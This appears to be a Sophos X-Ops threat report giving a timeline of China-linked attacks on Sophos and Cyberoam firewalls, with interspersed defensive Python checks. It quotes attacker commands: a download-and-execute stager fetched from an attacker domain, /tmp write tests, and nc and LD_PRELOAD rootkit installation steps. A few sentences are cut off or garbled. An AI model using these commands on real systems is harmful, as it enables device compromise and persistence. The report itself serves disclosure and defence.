As delineated in our overview article, Sophos has been actively countering various threat groups originating from China targeting perimeter devices such as Sophos firewalls. In this instance, we present a timeline outlining significant activities by these threat groups, alongside our coordinated responses and external reports attributing information and context.
Owing to the vast scope of the exposed activities, this is not an exhaustive review of all observed actions, nor does it encompass all Indicators of Compromise (IOCs). The purpose is to equip defenders with insights into crucial identified Techniques, Tactics, and Procedures (TTPs). The limited set of referenced IOCs is available in a machine-readable format and can be accessed here. Sophos X-Ops is open to collaboration with others and ready to share additional specific IOCs as needed. Please reach out to us via pacific_rim[@]sophos.com.
Important Note: This document refers to the MITRE ATT&CK® for Enterprise framework, version 15. Refer to the MITRE ATT&CK Tactics and Techniques section in this document for a breakdown of the threat actors’ actions mapped against MITRE ATT&CK tactics and techniques.
The initial assault was not directed at a network device but rather the solitary recorded attack on a Sophos facility: the headquarters of Cyberoam, a subsidiary based in India.
December 2018: Deciphering a trail of attack
Sophos identified a low-privilege computer – one responsible for managing a display unit affixed to the wall of the Cyberoam office – carrying out network scans (MITRE ATT&CK technique T1046).
Upon preliminary examination of the device, typical living-off-the-land tools and standard malware for persistence and reconnaissance were detected, signifying a relatively unsophisticated actor. However, leveraging an SSH key found on the device, X-Ops recognized the initiation of an attack path employing TTPs indicative of a more persistent threat. These included:
- Substituting the SSH and SSHD daemon with versions deemed related to a malware strain known as Onderon, as identified by ESET in their report The Dark Side of the ForSSHe; this family is also referred to as bl0wsshd00r67p1 (T1554)
- Windows and Linux variants of the Gh0st remote access Trojan (RAT)
- An innovative (for 2018) strategy to transition from on-premises devices to cloud resources by exploiting an excessively permissive IAM setup associated with AWS SSM (T1078.004)
- Moreover, a previously undisclosed, extensive, and intricate rootkit (later publicly analyzed and named Cloud Snooper by Sophos) was deployed (T1014)
Although this was the singular incident involving a direct assault on a Sophos facility, it highlighted an adaptable enemy capable of escalating capabilities as required to accomplish their goals. For instance, the threat actor displayed profound familiarity with AWS SSM (a relatively novel technology in 2018) and deployed a kernel-level rootkit with surreptitious command and control (C2) employing ATT&CK technique T1205.002.
Commencing in early 2020 and persisting through a significant portion of 2022, the adversaries invested substantial energy and assets in multiple offensives aimed at devices with public-facing web interfaces (T1190).
The two services under attack were a) a user interface mainly utilized for remote clients to download and configure a VPN client and b) an administrative interface for general device setup. These services, typically limited to LAN access, were increasingly made remotely accessible by device owners due to the rise in remote work during the COVID-19 pandemic.
In a swift succession of attacks, the adversary exploited a series of previously unknown vulnerabilities it had unearthed, then put into operation, targeting these web interfaces. The initial intrusion exploits granted the attacker code execution with limited privileges, which, combined with additional exploits and privilege escalation tactics (T1059.004, T1203), facilitated the installation of malware with root-level privileges on the device.
CVE-2020-12271 (Asnarök)
April 21, 2020: A notable proximity
A day prior to the Asnarök assaults, X-Ops received an external bug bounty report outlining a critical SQL injection (SQLi) flaw in the same platform targeted in the attacks. The reported vulnerability differed from the one employed in the attack, and the researcher had previously contributed to our program, leading to low confidence in any direct link to the attack. Nevertheless, given the suspicious timing of the report (day preceding the attack) and the researcher’s location: Chengdu, a Chinese city identified later as the hub of the tracked activities in this report, we include the submission here.
April 22, 2020: Detection of Asnarök attacks
Reports reached X-Ops regarding a peculiar value in the administrator-visible sfmipport database field. This anomaly manifested solely in a subset of devices with specific firmware versions, where a post-exploit automation flaw caused a cleanup process to fail.
Examination of an affected device revealed an SQLi vulnerability that Sophos would later assign as CVE 2020-12271. This vulnerability, combined with a command injection privilege escalation (T1059), enabled the attacker to obtain root access to the device and deploy the Asnarök Trojan (T1203). The Trojan was installed via the subsequent command injected into the database table:
||cd /tmp/ && wget https://sophosfirewallupdate[.]com/sp/install.sh -O /tmp/x.sh && sh /tmp/x.sh||
The Asnarök assault also marked the initial attempt to disrupt hotfixes on devices, with the threat actor implementing a script loop to consistently set the administrative setting to decline hotfixes (T1562.006).
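As an added defender-side example (not Sophos code), the check below audits a set of administrator-visible configuration fields for the pattern described above: a field that should only ever hold a port number instead carrying a shell command chain. The field names other than sfmipport, and the schema that maps them to port values, are assumptions; the sample values are constructed, with the stager URL kept defanged.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample of administrator-visible database fields (field names
# other than sfmipport are assumed for illustration). The sfmipport value
# mirrors the injected command described above, with the URL kept defanged.
SAMPLE_FIELDS: Dict[str, str] = {
    "sfmipport": "||cd /tmp/ && wget https://sophosfirewallupdate[.]com/sp/install.sh "
                 "-O /tmp/x.sh && sh /tmp/x.sh||",
    "sfmiphost": "10.0.0.5",
    "webadminport": "4444",
}

# Fields whose only legitimate content is a TCP port number (assumed schema).
PORT_FIELDS = {"sfmipport", "webadminport"}

# Tokens that have no business inside a configuration value: shell operators
# and the download-and-execute idiom used by the install.sh stager.
SHELL_TOKENS = ("||", "&&", ";", "`", "$(", "wget ", "curl ", "sh /tmp", "/tmp/")

URL_RE = re.compile(r"https?://[^\s'\"|&;]+")


def is_valid_port(value: str) -> bool:
    """True only for a bare decimal TCP port in 1..65535."""
    return value.isdigit() and 1 <= int(value) <= 65535


def extract_urls(value: str) -> List[str]:
    """Pull any URLs out of a field value so they can be blocked or sinkholed."""
    return URL_RE.findall(value)


def audit_fields(fields: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (field, reason) findings. Schema validation comes first: a port
    field that is not a port is anomalous regardless of what it contains, so
    the token list is a secondary signal rather than the primary detection."""
    findings: List[Tuple[str, str]] = []
    for name, value in fields.items():
        if name in PORT_FIELDS and not is_valid_port(value):
            findings.append((name, "expected a port number, got %r" % value[:40]))
        hits = [tok for tok in SHELL_TOKENS if tok in value]
        if hits:
            findings.append((name, "shell tokens present: " + ", ".join(hits)))
        for url in extract_urls(value):
            findings.append((name, "remote payload URL: " + url))
    return findings


if __name__ == "__main__":
    for field, reason in audit_fields(SAMPLE_FIELDS):
        print(f"[!] {field}: {reason}")
```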
April 23, 2020: Identification and mitigation of hotfixes
Sophos released an automatically implemented hotfix to address CVE 2020-12271, remove identified malware, and (crucially) enhance the quantity and variety of data transmitted by firewalls.
The hotfix furnished X-Ops with broader visibility into maliciously altered devices. It remedied the CVE-2020-12271 vulnerability and terminated known malicious processes active on devices.
April 24, 2020: Focusing on ground zero
By correlating telemetry from the hotfixes with trial license registration data and web metrics, X-Ops analysts managed to construct a timeline of preparatory efforts for the attack.
Most notably, a single device exhibiting suspicious behavior since February 2020 was identified. Telemetry analysis indicated experimental command injection values inscribed in the sfmipport database field (used in the Asnarök attack). The device’s IP address traced back to Chengdu in the Sichuan province of China.
Bolstered by trial license data, multiple…linked to synonymized devices. Data from these gadgets demonstrated usage of terminal commands and activities that align with exploring vulnerabilities and developing exploits. Examples include inserting these scripts into the sfmipport field of the interface to evaluate the capability of writing files to the directory /tmp:
||touch /tmp/exploit.txt|| :443; echo xxx>/tmp/su1112;:443 :echo xxx>/tmp/su1112;:443
Connected profiles were also detected accessing Knowledge Base articles related to the structure of the gadgets.
The X-Ops unit leveraged additional pivoting in combination with OSINT analysis to determine with moderate confidence that the gadget belonged to Sichuan Silence Information Technology’s Double Helix Research Institute, situated in Sichuan, China.
April 23 – May 10, 2020: Toolset for moving forward
Upon reviewing the Asnarök breach, X-Ops crafted a specialized kernel implant to install on devices that Sophos had high confidence were under the control of groups engaged in malicious exploit exploration. This tool allowed for remote data and log retrieval without leaving any noticeable traces.
April 24 – 26, 2020: Seizure of servers
X-Ops sought help from the National Cyber Security Centre of the Netherlands (NCSC-NL) to facilitate the confiscation of the server in the Netherlands hosting the domain ragnarokfromasgard[.]com, the primary C2 conduit used by the Asnarök malware. NCSC-NL acted as a go-between with the Dutch National High Tech Crime Unit. NHTCU swiftly filed for a warrant to take control of the server.
The X-Ops team also requested the US-based domain registrar to hand over management of the domain – as well as a few others registered by the same user and hosted on the same server – to Sophos.
Two days after initial contact, the warrant was sanctioned, and the primary C2 server was disconnected and scrutinized forensically by the NCSC-NL and the NHTCU.
Sophos X-Ops made our inquiry into the breach public, marking the first instance in which the company publicly investigated an attack on its own hardware. The post named the breach Asnarök (alluding to the domain name “ragnarokfromasgard.com” utilized during the breach).
April 28, 2020: Communication
Sophos commenced outreach to the minor segment of registered users who did not automatically receive the patches (namely, outdated gadgets and gadgets where administrators had disabled automatic patching).
May 3, 2020: Enhanced detection and response capabilities
X-Ops initiated collaboration with Sophos’ product engineering group to incorporate new broadened detection and response features into the firewall data collection process.
May 4, 2020: Control acquisition of domains
The domain registrar relinquished control of domains utilized by the Asnarök malware, plus other domains registered by the same user (none of which had ever been utilized for legitimate purposes), to Sophos. X-Ops redirected the domains to a sinkhole under Sophos’ control. This switch cut off the attacker’s C2 avenues, and the sinkhole provided Sophos with additional insights into compromised gadgets.
May 5, 2020: Evaluation of sinkhole
Reviewing the logs from the sinkhole requests uncovered numerous distinct User-Agents and requested URIs. In addition to anticipated requests from a limited number of unpatched and outdated Sophos gadgets, X-Ops pinpointed User-Agent strings and payload requests corresponding to consumer and SOHO routers from other manufacturers, as well as varied requests potentially linked to the Ragnarok ransomware (T1584.008).
May 20, 2020: Rectification
Sophos engineering introduced a patch to enforce password resets on potentially affected gadgets and implemented a login captcha to impede automation of credential-stuffing.
May 21, 2020: Detailed divulgence
Sophos X-Ops shared a subsequent blog unpacking fresh insights about the breach: The Asnarök threat actor altered the course of the breach twice while it was unfolding in April.
CVE-2020-15069 (Buffer overflow in Bookmark feature)
April 9, 2020: Preparations for Round 2
Just as attackers were gearing up to exploit CVE-2020-12271 in the Asnarök attacks, the development of another exploit was already in progress. Through retrospective threat tracking, on this date X-Ops flagged the inaugural sighting of what eventually became CVE-2020-15069.
Analyzing the device and other devices associated with the same source IP revealed features linked to a testing environment:
- Regular power cycling
- Reverting to prior firmware editions (indicative of restoring from a disk snapshot)
- Registration details using complimentary webmail services (in this situation, 163.com, a provider based in China)
- A multitude of devices (comprising physical and virtual ones), running diverse and frequently changing firmware versions
- A scarce number of devices linked via the LAN interface
- WAN interfaces with private IP addresses, hidden behind network address translation from another device (Huawei)
Tracing the serial numbers of the physical devices indicated that they were procured by an authorized partner and likely resold second-hand.
June 17, 2020: Kickoff of Round 2
On this day, 56 days after the commencement of the Asnarök attack, the threat actor began exploiting a zero-day buffer overflow vulnerability (CVE-2020-15069) in a custom Apache module. This exploit, combined with a local elevation of privileges, was utilized to deploy an indiscriminate malicious web shell to gadgets running a web portal facing the WAN (T1505.003).
June 18, 2020: Adversarial adaptability
Scrutiny of the attack and web shell unveiled major variations in attacker tactics, nullifying several defensive strategies employed during the Asnarök attacks:
- Lack of centralized C2: In Asnarök, X-Ops successfully took control of the C2 domains, effectively neutralizing the malware. The web shell did not communicate with external C2 servers for instructions; instead, it awaited inbound directives.
- Simplicity: The Asnarök malware was extensive with considerable functionalities integrated directly, enabling X-Ops to decipher likely malicious intent. By utilizing a compact web shell providing command execution, the attackers managed to conceal their intent and maintain payloads on the server-side of systems not within X-Ops’ visibility.
- Stealth: The simplicity of the web shell diminished detection opportunities, as no extra active processes or permanence mechanisms were necessary. Moreover, to impede external detection, the web shell would respond with an HTTP 400 to any request lacking the correct password. X-Ops attempted unsuccessfully to crack the password hash stored directly in the web shell.
X-Ops promptly pinpointed the initial entry point and affected gadgets by leveraging the updated telemetry-collection capabilities integrated into gadgets post the Asnarök attacks. Furthermore, the telemetry aided in identifying a solitary, presumably attacker-controlled, patient-zero gadget where a version of this web shell had been deployed on April 9, prior to both the Asnarök attack and this attack.
June 24, 2020: Concealment of origin
Postmortem evaluation noted around 175 unique IP addresses that had been issuing commands to the infected appliances since June 17. All these IP addresses were part of an anonymizing network, obscuring the actual source of the attacks (T1090.003).
June 25, 2020: Cleanup
The product engineering team unveiled a set of hotfixes aimed both at fixing the CVE-2020-15069 vulnerability that allows code execution and at eradicating the malware that was planted on the devices. The hotfixes also removed the attacker's alterations that had prevented the products from receiving hotfixes.
February 18, 2021: Extracting final value
Following a period of twelve weeks without incidents, X-Ops discovered renewed movements targeting unpatched and outdated devices, utilizing the CVE-2020-15069 vulnerability. The payloads siphoned off the credentials stored on the appliance and introduced a backdoor.
This onslaught presented distinct payloads compared to previous attacks – two Linux shell scripts known as patch.sh and IC.sh (T1059).
The IC.sh script collected local user account data from the device and transmitted it to an IP address owned by a Hong Kong-based ISP. It also retrieved an encoded copy of patch.sh, which it wrote to the filesystem. It altered a setting in a database that deactivated automatic hotfix updates, recurrently executing the command every five minutes (T1562.001). Interestingly, the location where the attacker positioned IC.sh happened to be the same filesystem path utilized for malevolent scripts during the April 2020 Asnarök onslaughts. The antagonist also subverted the hotfixing mechanism, a behavior initially noticed during the June 2020 Bookmark Buffer Overflow strikes.
The patch.sh script executed hourly and made attempts to erase any traces that could indicate the device’s compromise left in a database.
This offensive also stood out in the sense that the assailants engaged directly with the telemetry system, aiming to cloak their actions and as a countermeasure against the telemetry enhancements implemented in the previous April post the Asnarök incident.
June 30, 2020: Verification of Telemetry
Employing additional telemetry gathering, exploration of threats revealed a device exhibiting suspicious command executions. Assessment identified several atypical elements including masscan (a network port scanner) and a basic RAT. Further scrutiny pinpointed an additional 21 affected devices. It was established that in all instances, the initial access resulted from weak SSH credentials (T1110.001). While X-Ops deduced that the attack was likely isolated and disconnected from the larger and more sophisticated offensives, it did, however, demonstrate the efficacy of additional telemetry and threat-hunting procedures.
July 9, 2020: Initial Implant Deployment
Delving into the telemetry data, X-Ops analysts identified a device that they confidently attributed to the Double Helix entity. After consulting with legal advisors, X-Ops rolled out the targeted implant and witnessed the perpetrator using vim to compose and execute a modest Perl script. Despite its limited utility, the deployment showcased the competence of intelligence collection by granting almost real-time monitoring of devices controlled by the assailant.
July 14, 2020: First Encounter with TStark
During the pursuit for the earliest devices subjected to the bookmark buffer overflow exploit, X-Ops came across a threat actor internally dubbed as “TStark,” alongside a grouping of devices registered under the threat actor (utilizing a Proton Mail email address initiating with “TStark”).
The TStark set of devices encompassed some of the primary instances of malevolent payloads linked to the bookmark buffer overflow attack targeting CVE-2020-15069 (T1203). Furthermore, the devices displayed peculiar telemetry behavior hinting at intermittent VPN usage, with the telemetry sources swiftly oscillating between IP addresses geolocating to Hong Kong, then Chengdu, and back to Hong Kong (T1133).
X-Ops established that one of the tangible devices subsequently registered under the TStark persona had previously been registered by a former scholar at the University of Electronic Science and Technology of China (UESTC) in Chengdu.
July 27, 2020: Yield
Following refinements in methodologies to pinpoint assailant devices, X-Ops deployed the targeted implant to a set of devices linked with the Double Helix entity.
The additional visibility swiftly enabled X-Ops to expose a formerly uncharted and surreptitious remote code execution exploit. Unlike previous exploits necessitating chaining with privilege escalation maneuvers altering database values (a perilous and conspicuous operation that facilitated detection), this exploit left minimal traces and bestowed direct access to root. Below is a glimpse of the command-line activities that led to the revelation of the emerging zero-day exploit under development:
gdb -p 2951 ls ls ls -lsa nopcode -d -n nosync -t json -b … (truncated for brevity) … ls rm zz77 ls
Leveraging the implant’s capabilities to fetch data concerning the exploit, X-Ops identified a command injection vulnerability through the X-Forwarded-For http header in a brute-force detection component. Subsequently, they managed to replicate the exploit and collaborated with engineering teams to implement a fix.
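The vulnerability class above, a brute-force detection component handing the attacker-controlled X-Forwarded-For value to a shell, is a general one. As an added example (not the product's code), the block below shows how such a component can consume the header safely: strictly parse the client hop as an IP address, reject anything else, and build the block rule as an argv list so no shell ever interprets the string. The proxy chain handling, the iptables rule shape and the threshold are assumptions; the headers are constructed.

```python
import ipaddress
from collections import defaultdict
from typing import Dict, Iterable, List, Optional, Union

IPAddress = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]


class HeaderValidationError(ValueError):
    """Raised when X-Forwarded-For does not yield a usable client address."""


def client_ip_from_xff(header_value: Optional[str], trusted_proxies: Iterable[str]) -> IPAddress:
    """Derive the client address from X-Forwarded-For the safe way.

    The header is a comma-separated chain "client, proxy1, proxy2". Every hop
    except the ones appended by our own trusted proxies is attacker-controlled
    text, so walk from the right, skip trusted proxies, and strictly parse the
    first remaining entry as an IP address. Anything that does not parse (shell
    metacharacters, hostnames, empty strings) is rejected outright.
    """
    if not header_value:
        raise HeaderValidationError("missing X-Forwarded-For")
    trusted = set(trusted_proxies)
    hops = [h.strip() for h in header_value.split(",")]
    for hop in reversed(hops):
        if hop in trusted:
            continue
        try:
            return ipaddress.ip_address(hop)
        except ValueError:
            raise HeaderValidationError("non-IP value in X-Forwarded-For: %r" % hop) from None
    raise HeaderValidationError("X-Forwarded-For contains only trusted proxies")


def is_safe_xff(header_value: Optional[str], trusted_proxies: Iterable[str] = ()) -> bool:
    """Convenience predicate: does the header yield a valid client address?"""
    try:
        client_ip_from_xff(header_value, trusted_proxies)
        return True
    except HeaderValidationError:
        return False


def build_block_command(ip: IPAddress) -> List[str]:
    """Build the block rule as an argv list for subprocess.run(..., shell=False).
    The address is already a validated ipaddress object and no shell interprets
    the string, so an injected payload has nothing to reach. The iptables rule
    shape is an assumption for illustration."""
    return ["iptables", "-I", "INPUT", "-s", str(ip), "-j", "DROP"]


class BruteForceTracker:
    """Minimal failed-login counter; returns a block command once a source
    crosses the threshold. Only validated addresses are ever used as keys."""

    def __init__(self, threshold: int = 5) -> None:
        self.threshold = threshold
        self.failures: Dict[IPAddress, int] = defaultdict(int)

    def record_failure(self, xff_header: Optional[str],
                       trusted_proxies: Iterable[str] = ()) -> Optional[List[str]]:
        ip = client_ip_from_xff(xff_header, trusted_proxies)  # raises on hostile input
        self.failures[ip] += 1
        if self.failures[ip] == self.threshold:
            return build_block_command(ip)
        return None


if __name__ == "__main__":
    tracker = BruteForceTracker(threshold=3)
    # Constructed headers: a legitimate chain through our proxy, then a hostile one.
    cmd = None
    for _ in range(3):
        cmd = tracker.record_failure("203.0.113.7, 10.0.0.2", trusted_proxies={"10.0.0.2"})
    print("block command:", cmd)
    print("hostile header accepted?", is_safe_xff("203.0.113.7; touch /tmp/x"))
```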
July 28, 2020: Impact Evaluation
Exploration for threats discovered that two devices – one utilized by a legal firm, the other by an IT services organization – had been subjected to the exploit.
X-Ops ascertained that both devices established a reverse shell connection with the same IP address (belonging to a US-based hosting agency) (T1059).
July 30, 2020: Concealed Hotfixing
Sophos dispatched a patch to all vulnerable devices, encompassing the two compromised devices identified three days prior. Leveraging prior web-analytics scrutiny, X-Ops were cognizant of attackers monitoring the Sophos knowledge base (KB) articles linked with hotfixes and patches, compelling them to disguise the fix. Sophos engineers formulated the patch to address various inconsequential low-severity problems to mask a critical emergent capability.
August 9-13, 2020: Added Intelligence from Implants
X-Ops spotted additional suspicious activities on monitored devices, involving binaries in /tmp establishing connections with external IP addresses on ports 4438 and 4439.
Subsequent analysis uncovered a lower-severity post-authentication remote code execution vulnerability in an operating system component (T1210). X-Ops initiated efforts on a fix to rectify the vulnerability.
August 13 – 14, 2020: Rootkit #2: A thwarted advancement in stealth
Whilst delving into the analysis of the Bookmark Buffer Overflow onslaught, X-Ops managed to access a unique malware sample directly from a device registered under “TStark.”
The sample, acknowledged as libxselinux.so, constituted a bespoke userland rootkit derived from code initially attributed to the Winnti threat actor group (T1014).
The malware comprised two components: a central engine for communication with a command-and-control server, and a userland rootkit module that inspects devices on the local system during startup then triggers the central module (T1547).
Retrospective probing failed to uncover any other instances of libxselinux.so beyond the solitary TStark device. To deter any prospective future exploitation, Sophos proactively implemented security measures to identify and prevent the rootkit (classified as Linux/Winnti-T). Subsequent evaluations post-patch confirmed the ineffectiveness of the attack, cementing the efficacy of the rapid response executed by X-Ops and Sophos.
August 21, 2020: TStark’s Readiness
X-Ops managed to acquire several data units from a TStark device. Amongst the data units obtained from the malicious actor were software created to operate on Mac OS X and iOS, along with an IFRAME injection script exploiting a flaw in WebAssembly (wasm) (T1189).
August 31 – October 31, 2020: Targets in Tibet and Third Rootkit
In partnership with Volexity, Sophos aided an institution offering assistance to Tibetan exiles. Examination of the impacted device unveiled IOC correlation with the “TStark” threat actor tools (recognized just a mere 10 days earlier) and a faction Volexity nicknamed Evil Eye (and credited to “multiple Chinese APT actors”).
Researchers at Volexity also distributed examples of a rootkit they came across on the aforementioned device. X-Ops analysts concluded the data units were part of a loadable kernel module (LKM) rootkit titled Suterusu, accessible from a GitHub repository (T1014). The Suterusu payload was compiled with all elective features excluded, hence the functionality was confined to the 18 commands listed in the README document.
November 27, 2020: Easy Targets
The Cyberoam selection of products, a dated product series nearing obsolescence at that time, came under assault around two years after the assault on Cyberoam’s former establishments in India.
The adversary exploited a zero-day which later transpired into CVE-2020-29574 to establish a new user account with administrator privileges, labeled “cybersupport,” on impacted gadgets (T1136.001).
Sophos deployed an instant fix to mend the loophole and eliminate intruder-initiated accounts. The corporation reached out to registered owners advising them either to upgrade their gadgets or discontinue their usage entirely.
July 21, 2021: ANSSI Crediting
Eight months after the November 2020 SQL injection assault on Cyberoam appliances, the French government’s cybersecurity body, ANSSI, publicly attributed the Cyberoam account creation assault to the China-based threat entity APT-31.
The ANSSI declaration revealed that impacted Cyberoam devices were exploited by threat actors as an intermediary or proxy to launch assaults on other gadgets, such as Ivanti remote access gateways. An APT strategy that is now prevalent, utilizing the impacted gadgets in this manner aided the assailant in masking the genuine source of the assaults against the other targeted gadgets.
Commencing from 2021, the enemies seemed to shift their concentration from widespread indiscriminate assaults to highly specific, “hands-on-keyboard” narrow-focused assaults against unique entities: governmental agencies, vital infrastructure, research and development institutions, healthcare providers, retail, finance, military, and governmental institutions primarily in the Asia-Pacific region.
CVE-2022-1040 (“Personal Panda”)
March 21, 2022: A Dual Involvement?
For the second time, Sophos received a bug bounty report that was at once very valuable and dubious. An anonymous security researcher disclosed a zero-day to the Sophos bug bounty program; it was labeled as CVE-2022-1040. The researcher, who opted for no acknowledgment, claimed to be located in Japan; however, the IP address of the device they were utilizing was geographically traced back to China. They were remunerated with a $20,000 bounty.
The report contained two distinct vulnerabilities: an authentication circumvention defect in SFOS, and a command injection defect in OpenSSL that the researcher utilized for privilege escalation to attain a root shell.
March 23, 2022: A Swift Correction
Sophos introduced an instant fix to address the issue.
March 24, 2022: Analysis of Victims
Through retrospective investigations, X-Ops identified active exploitation of CVE-2022-1040 before the bug bounty submission. Though its prevalence was limited, victimology and timing demonstrated a targeting pattern aligning with PRC-based foreign policy objectives, particularly focusing on:
- A governmental department of high stature during a critical phase of BRI-related debt negotiations
- The same target related to Tibet attacked in August 2020
March 25, 2022: Revelation
Sophos issued the CVE-2022-1040 advisory.
March 26 – April 7, 2022: Rootkit #4
X-Ops’ continuous hunting for threats, outreach to affected entities, and scrutiny of impacted gadgets unveiled a multifaceted scenario of post-exploitation tools and TTPs consistent with manual targeting and distribution.
Sophos disclosed a segment of their findings in July 2022.
In addition to previously revealed components, X-Ops also discovered an additional set of activities linked to CVE-2022-1040 centered around a distinctive and custom-made rootkit, libsophos.so (T1014).
X-Ops identified two instances of libsophos.so, both deployed using CVE-2022-1040 – one on a governmental gadget and the other on a technological partner to the same governmental department.
Operational alongside a version of Gh0st RAT, libsophos.so during examination unveiled a uniquely crafted, fully equipped userland rootkit emulating Sophos product file naming trends and behavior (T1036).
X-Ops analysis unveiled that the libsophos.so library could infuse itself into the system’s SSH daemon (SSHD) by leveraging the LD_PRELOAD environment variable. This allowed the library to load prior to other system libraries, effectively inserting itself into the SSHD operation and modifying its behavior. Notably, it introduced the capability to monitor and respond to specifically crafted ICMP packets, which, upon reception by an affected gadget, would initiate a SOCKS proxy or a reverse shell back-connection to an IP address favored by the attacker (T1090, T1059). This was reminiscent of the December 2018 Cloud Snooper attack, that utilized the same methodology.
X-Ops successfully associated the development of libsophos.so with the TStark actor in hindsight. On February 18, 2022, shell history on two gadgets linked to TStark (1 physical, 1 virtual) showcased the actor renaming and running libsophos.so (also known as libgoat.so) on their gadgets, in addition to testing persistence:
rm -f /lib/libsophos.so
nc 192.168.1.85 4444 > /lib/libsophos.so
mv /tmp/server_x32 /lib/libsophos.so
sed -e 's/exec /bin/dropbear/export LD_PRELOAD=libsophos.so
chmod +x /bin/killlibgoat
mv /tmp/goatserver_x64 /etc/libgoat.so
killall libgoat.so
An iteration of libsophos.so observed on the assailants’ gadgets shared an identical hash (c71cd27efcdb8c44ab8c29d51f033a22) as spotted on the victim gadgets.
One of the gadgets also contained copies of valgrind and prex, tools frequently utilized for debugging and control flow tracing. The email address linked to the administrator account on this gadget was publicly tied to a Chinese offensive-security researcher and Linux shellcode expert.
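The LD_PRELOAD injection into the SSH daemon described above, and the shell history that shows it being set up, leave artifacts a defender can check on any Linux host without vendor tooling. As an added example (not Sophos code), the block below audits a process for those artifacts: LD_PRELOAD in its environment, a populated /etc/ld.so.preload, and mapped shared objects outside an allowlist of library directories. The /proc contents are constructed, the library directory allowlist is an assumption, and the library name simply follows the page's libsophos.so.

```python
import os
from typing import Dict, List, Tuple

# Constructed sample of /proc/<pid>/maps for an SSH daemon into which a
# library has been preloaded. Addresses and inode numbers are made up.
SAMPLE_MAPS = """\
55d1c0a00000-55d1c0a80000 r-xp 00000000 08:01 1234 /usr/sbin/sshd
7f2a10000000-7f2a10020000 r-xp 00000000 08:01 2222 /lib/libsophos.so
7f2a11000000-7f2a11200000 r-xp 00000000 08:01 3333 /lib/x86_64-linux-gnu/libc.so.6
7f2a12000000-7f2a12010000 r-xp 00000000 08:01 4444 /lib/x86_64-linux-gnu/libpam.so.0
7ffd3c000000-7ffd3c021000 rw-p 00000000 00:00 0 [stack]
"""
# Constructed /proc/<pid>/environ (NUL-separated) and /etc/ld.so.preload contents.
SAMPLE_ENVIRON = b"PATH=/usr/sbin:/usr/bin\x00LD_PRELOAD=libsophos.so\x00LANG=C\x00"
SAMPLE_LD_SO_PRELOAD = "/lib/libsophos.so\n"

# Assumed allowlist of directories from which this host's sshd may load
# shared objects; tune to the distribution's actual library layout.
ALLOWED_LIB_PREFIXES = ("/lib/x86_64-linux-gnu/", "/usr/lib/x86_64-linux-gnu/", "/usr/lib64/")

Finding = Tuple[str, str]  # (kind, detail)


def mapped_libraries(maps_text: str) -> List[str]:
    """Unique shared-object paths from a /proc/<pid>/maps listing."""
    libs: List[str] = []
    for line in maps_text.splitlines():
        parts = line.split(maxsplit=5)
        if len(parts) < 6:
            continue  # anonymous mapping, no backing file
        path = parts[5]
        if (path.endswith(".so") or ".so." in path) and path not in libs:
            libs.append(path)
    return libs


def parse_environ(raw: bytes) -> Dict[str, str]:
    """Decode the NUL-separated /proc/<pid>/environ blob into a dict."""
    env: Dict[str, str] = {}
    for item in raw.split(b"\x00"):
        if b"=" in item:
            key, _, value = item.decode("utf-8", "replace").partition("=")
            env[key] = value
    return env


def audit_process(maps_text: str, environ_raw: bytes, ld_so_preload_text: str) -> List[Finding]:
    """Flag the three preload artifacts: LD_PRELOAD in the daemon's environment,
    any entry in /etc/ld.so.preload, and mapped libraries outside the allowlist.
    A daemon started with LD_PRELOAD keeps it in /proc/<pid>/environ, and the
    injected object shows up in its maps even if the variable was later unset."""
    findings: List[Finding] = []
    env = parse_environ(environ_raw)
    if "LD_PRELOAD" in env:
        findings.append(("LD_PRELOAD", env["LD_PRELOAD"]))
    for entry in ld_so_preload_text.split():
        findings.append(("ld.so.preload", entry))
    for lib in mapped_libraries(maps_text):
        if not lib.startswith(ALLOWED_LIB_PREFIXES):
            findings.append(("unexpected-library", lib))
    return findings


def audit_live_pid(pid: int) -> List[Finding]:
    """Run the same checks against a real process (reading environ needs root)."""
    with open(f"/proc/{pid}/maps") as f:
        maps_text = f.read()
    with open(f"/proc/{pid}/environ", "rb") as f:
        environ_raw = f.read()
    preload = ""
    if os.path.exists("/etc/ld.so.preload"):
        with open("/etc/ld.so.preload") as f:
            preload = f.read()
    return audit_process(maps_text, environ_raw, preload)


if __name__ == "__main__":
    for kind, detail in audit_process(SAMPLE_MAPS, SAMPLE_ENVIRON, SAMPLE_LD_SO_PRELOAD):
        print(f"[!] {kind}: {detail}")
```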
April 2, 2022: OpenSSL Discoveries
Sophos unveiled the OpenSSL flaw on April 2; the vulnerability was designated the identifier CVE-2022-1292.
April 7, 2022: Concealment in JARs
Sustained analysis exposed a novel persistence TTP – Trojanized
May 2022: libsophos resurfaces
A search revealed a third device harboring the libsophos.so rootkit (T1014). This device was located in a military hospital in a distinct Asian nation compared to the initial targets.
May 3, 2022: Resolution for OpenSSL
OpenSSL introduced a resolution for CVE-2022-1292.
June 16, 2022: Sliver Discovery
Following the acquisition of additional Indicators of Compromise (IOCs) through collaboration with Volexity (who would later document this as DriftingCloud), X-Ops initiated further searches looking for communications with the C2 IP 192.248.152.58.
This search unveiled a single device, owned by a healthcare technology provider, operating a malware instance known as libiculxg.so. Subsequent X-Ops analysis confirmed libiculxg.so’s association with the versatile adversary emulation framework “Sliver.”
October 19-29, 2022: Revelations at Conferences
Sophos X-Ops presented a paper (“Your Own Personal Panda”) detailing our investigation into the CVE-2022-1040 assault and its malicious payloads at three conferences: Virus Bulletin, BruCON, and Saintcon.
Concealed Pathways (CVE-2022-3236)
September 16, 2022: Oversight Lapse Offers a Clue
In collaboration with Microsoft’s Incident Response unit, X-Ops uncovered a compromised device owned by a significant Asian financial services provider. Examination of the device divulged the initial occurrence of a series of activities that Sophos subsequently revealed as the Concealed Pathways.
Particularly noteworthy were two emerging Techniques, Tactics, and Procedures (TTPs) (affecting a limited number of compromised devices):
- A refinement of the backdoored JAR method employed in the Personal Panda assaults to intercept credentials processed by the device’s web interface
- Utilization of intercepted credentials to conduct a DCSync credential retrieval from a LAN-based domain-controller (T1003.006)
X-Ops initiated a telemetric pursuit for other devices featuring the identified compromised JAR document. This pursuit pinpointed a small grouping of devices with akin victim profiles as those observed in the Personal Panda attacks. Initial analysis of the impacted devices exposed activities indicative of manual selection and deployment: variations in file denominations and access rights, and notably, inconsistencies in log erasure practices.
September 17, 2022: Discovery of Initial Entry
